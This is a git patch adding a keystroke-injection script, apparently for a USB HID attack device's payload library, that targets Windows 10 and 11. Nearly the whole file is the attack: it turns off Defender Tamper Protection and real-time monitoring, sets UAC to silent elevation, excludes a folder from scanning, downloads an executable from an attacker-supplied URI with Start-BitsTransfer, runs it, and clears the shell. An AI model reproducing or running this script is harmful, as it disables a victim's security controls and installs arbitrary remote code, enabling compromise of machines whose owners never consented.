From d237d080e63c2897e6e45def49ea04f8cbf0bb69 Mon Sep 17 00:00:00 2001 From: KryptoKola <119087357+KryptoKola@users.noreply.github.com> Date: Fri, 16 Dec 2022 13:59:18 -0500 Subject: [PATCH] payload.txt (#567) What the payload does: # 1) Disables Tamper Protection in Windows Defender. # 2) Disables UAC / Turns UAC off # 3) Creates Payload Directory in C:/ Drive # 4) Disables Real-Time Protection in Windows Defender. # 5) Adds the Payload Directory as an exclusion in Windows Defender # 6) Downloads Payload from Specified URI (Enter in Variable Below) # 7) Runs Payload on System --- .../Windows-Payload-Injector/payload.txt | 85 +++++++++++++++++++ 1 file changed, 85 insertions(+) create mode 100644 payloads/library/remote_access/Windows-Payload-Injector/payload.txt diff --git a/payloads/library/remote_access/Windows-Payload-Injector/payload.txt b/payloads/library/remote_access/Windows-Payload-Injector/payload.txt new file mode 100644 index 00000000..eb7a55e5 --- /dev/null +++ b/payloads/library/remote_access/Windows-Payload-Injector/payload.txt @@ -0,0 +1,85 @@ +#!/bin/bash +# +# Title: Microsoft Windows Payload Injector +# +# Description: +# 1) Disables Tamper Protection in Windows Defender. +# 2) Disables UAC / Turns UAC off +# 3) Creates Payload Directory in C:/ Drive +# 4) Disables Real-Time Protection in Windows Defender. +# 5) Adds the Payload Directory as an exclusion in Windows Defender +# 6) Downloads Payload from Specified URI (Enter in Variable Below) +# 7) Runs Payload on System +# +# Author: KryptoKola +# Version: 1.0 +# Category: Remote Access +# Target: Microsoft Windows 10 & 11 + +LED SETUP +ATTACKMODE HID +#Variables +readonly PAYLOAD_DOWNLOAD_URI="ENTER PAYLOAD URI HERE" + +#Disables Tamper Protection in Windows 10 & 11 +LED STAGE1 +Q GUI s +Q STRING "Virus & threat protection" +Q ENTER +Q DELAY 10000 +Q TAB +Q TAB +Q TAB +Q TAB +Q ENTER +Q DELAY 1000 +Q TAB +Q TAB +Q TAB +Q TAB +Q SPACE +Q DELAY 1000 +Q ALT y +Q DELAY 1000 +Q ALT F4 +Q FN ALT F4 + +#Starts Powershell in Admin mode +LED STAGE2 +Q GUI r +Q DELAY 250 +Q STRING powershell Start-Process powershell -Verb runAs +Q ENTER +Q DELAY 3000 +Q ALT y +Q DELAY 5000 + +#Disables UAC, Creates Payload Directory, and moves to C:/ directory in powershell +LED STAGE3 +Q STRING "cd C:/;mkdir Payloads;Set-ItemProperty -Path REGISTRY::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Policies\System -Name ConsentPromptBehaviorAdmin -Value 0;" +Q ENTER +Q DELAY 1500 +Q ALT y +Q DELAY 250 + +#Disables Real Time Protection, Makes an exclusion to the Payloads folder in Windows Defender, Navigates to the Payloads folder, then Downloads specified payload from URI. +LED STAGE4 +Q STRING "Set-MpPreference -DisableRealtimeMonitoring 1;Set-MpPreference -ExclusionPath "C:/Payloads";cd C:/Payloads;Start-BitsTransfer -Source ${PAYLOAD_DOWNLOAD_URI} -Destination ./payload.exe;" +Q ENTER +Q DELAY 2000 + +#Launches the Payload on the machine +LED STAGE5 +Q STRING ./payload.exe +Q ENTER +Q DELAY 250 + +#Clears the shell and exits out. +LED CLEANUP +Q STRING clear +Q ENTER +Q DELAY 250 +Q STRING exit +Q ENTER + +LED FINISH